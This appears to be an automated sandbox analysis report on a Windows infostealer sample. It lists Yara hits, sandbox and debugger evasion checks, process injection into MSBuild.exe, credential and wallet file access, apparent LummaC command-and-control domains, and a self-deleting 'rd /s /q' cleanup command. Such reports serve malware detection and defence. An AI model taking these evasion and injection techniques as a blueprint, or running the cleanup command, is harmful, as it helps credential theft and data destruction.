Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

4_2_0040180D

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe	API coverage: 1.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 7.8 %
Source: C:\ProgramData\CBFCFBFBFB.exe	API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6052	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4420	Thread sleep count: 78 > 30			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

4_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062735B FindFirstFileExW,	0_2_0062735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	4_2_0040CD37
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B0735B FindFirstFileExW,	13_2_00B0735B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

4_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410FBA GetSystemInfo,wsprintfA,

4_2_00410FBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: BFCGDA.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: BFCGDA.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BFCGDA.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.0000000001373000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: BFCGDA.4.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: BFCGDA.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: BFCGDA.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(=7
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: BFCGDA.4.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: BFCGDA.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BFCGDA.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: BFCGDA.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: BFCGDA.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: BFCGDA.4.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: BFCGDA.4.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BFCGDA.4.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BFCGDA.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: BFCGDA.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: BFCGDA.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: BFCGDA.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: BFCGDA.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BFCGDA.4.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006120AD VirtualProtect,LdrInitializeThunk,GetConsoleWindow,CloseHandle,SetCursorPos,

0_2_006120AD

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0061B5E6

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00418950

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061208F mov edi, dword ptr fs:[00000030h]	0_2_0061208F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00639362 mov eax, dword ptr fs:[00000030h]	0_2_00639362
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063937A mov eax, dword ptr fs:[00000030h]	0_2_0063937A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00639385 mov eax, dword ptr fs:[00000030h]	0_2_00639385
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00650472 mov eax, dword ptr fs:[00000030h]	0_2_00650472
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00627EE8 mov eax, dword ptr fs:[00000030h]	0_2_00627EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061EE9C mov ecx, dword ptr fs:[00000030h]	0_2_0061EE9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004014AD mov eax, dword ptr fs:[00000030h]	4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040148A mov eax, dword ptr fs:[00000030h]	4_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h]	4_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00418599 mov eax, dword ptr fs:[00000030h]	4_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041859A mov eax, dword ptr fs:[00000030h]	4_2_0041859A
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF208F mov edi, dword ptr fs:[00000030h]	13_2_00AF208F
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AFEE9C mov ecx, dword ptr fs:[00000030h]	13_2_00AFEE9C
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B07EE8 mov eax, dword ptr fs:[00000030h]	13_2_00B07EE8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0062A4E7 GetProcessHeap,

0_2_0062A4E7

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006174A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_006174A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0061B5E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006177C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006177C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00617952 SetUnhandledExceptionFilter,	0_2_00617952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042762E SetUnhandledExceptionFilter,	4_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6C8BB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6C8BB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6CA6AC62
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF74A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00AF74A0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AFB5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00AFB5E6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF77C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00AF77C5
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF7952 SetUnhandledExceptionFilter,	13_2_00AF7952

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_0040F54A

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: CBFCFBFBFB.exe	String found in binary or memory: questionsmw.stor
Source: CBFCFBFBFB.exe	String found in binary or memory: soldiefieop.site
Source: CBFCFBFBFB.exe	String found in binary or memory: mysterisop.site
Source: CBFCFBFBFB.exe	String found in binary or memory: absorptioniw.site
Source: CBFCFBFBFB.exe	String found in binary or memory: treatynreit.site
Source: CBFCFBFBFB.exe	String found in binary or memory: snarlypagowo.site
Source: CBFCFBFBFB.exe	String found in binary or memory: abnomalrkmu.site
Source: CBFCFBFBFB.exe	String found in binary or memory: chorusarorp.site

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		4_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		4_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 882008	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11BF008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00639076 cpuid

0_2_00639076

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0062A0B0
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_0062A1B6
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	0_2_0065D2BB
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0062A285
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0065F44E
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00629921
